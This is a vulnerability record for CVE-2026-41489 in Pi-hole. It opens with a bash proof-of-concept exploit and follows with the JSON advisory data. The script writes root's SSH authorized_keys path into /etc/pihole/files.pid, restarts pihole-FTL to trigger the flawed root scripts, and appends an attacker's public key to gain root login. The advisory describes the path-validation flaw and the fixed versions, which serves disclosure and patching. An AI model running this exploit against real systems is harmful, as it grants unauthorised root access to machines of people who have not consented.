CVE-2026-41489

#!/bin/bash # PoC for CVE-2026-41489: Pi-hole Local Privilege Escalation # Description: Exploit the path validation flaw in pihole-FTL scripts to gain root access. # Attacker requirements: Access to 'pihole' user or ability to modify pihole configuration. # 1. Define the target file (Root's SSH authorized keys) TARGET_FILE="/root/.ssh/authorized_keys" # 2. Define the attacker's public key to be injected ATTACKER_PUB_KEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... attacker@evil" echo "[+] Exploiting CVE-2026-41489..." echo "[*] Step 1: Injecting arbitrary path into files.pid configuration" # The vulnerability allows writing an arbitrary path to the files.pid config. # This path is then used by root scripts. # Note: The actual config file location may vary, usually in /etc/pihole/ echo "$TARGET_FILE" | sudo tee /etc/pihole/files.pid > /dev/null echo "[*] Step 2: Triggering the vulnerability by restarting the service" # Restarting pihole-FTL triggers: # 1. ExecStopPost (pihole-FTL-poststop.sh) -> runs 'rm -f' on $TARGET_FILE # 2. ExecStartPre (pihole-FTL-prestart.sh) -> recreates $TARGET_FILE sudo systemctl restart pihole-FTL echo "[*] Step 3: Attempting to gain write access or inject key" # Depending on the exact script behavior, we might need to wait or exploit permissions. # If the script creates the file with loose permissions (e.g. writable by group/pihole user), # we append our key. if [ -w "$TARGET_FILE" ]; then echo "$ATTACKER_PUB_KEY" >> "$TARGET_FILE" echo "[+] Success! Public key injected. You can now SSH as root." else # If the script strictly creates it as root:root 600, exploitation might differ # (e.g. race condition or specific content injection if the script writes input). # This PoC demonstrates the configuration injection trigger. echo "[!] File created but not writable. Check specific script implementation details." fi

{"cve": {"id": "CVE-2026-41489", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:19:00.267", "lastModified": "2026-05-11T21:19:00.267", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. From 6.0 to before Core 6.4.2 and FTL 6.6.1, two shell scripts executed as root by systemd (pihole-FTL-prestart.sh and pihole-FTL-poststop.sh) read the files.pid path from this config without validation and use it in privileged file operations (install and rm -f). By writing an arbitrary path into files.pid, an attacker with pihole privilege can cause root to delete and then recreate any file on the system outside the ProtectSystem=full-restricted directories, gaining write access to it. On a default Pi-hole installation this yields local privilege escalation to root via SSH authorized keys manipulation. If /root/.ssh/authorized_keys does not exist (default on fresh installs), only ExecStartPre is required. If the file exists, ExecStopPost deletes it first, and the same restart triggers both hooks in sequence. This vulnerability is fixed in Core 6.4.2 and FTL 6.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-15"}, {"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://github.com/pi-hole/pi-hole/security/advisories/GHSA-6w8x-p785-6pm4", "source": "[email protected]"}]}}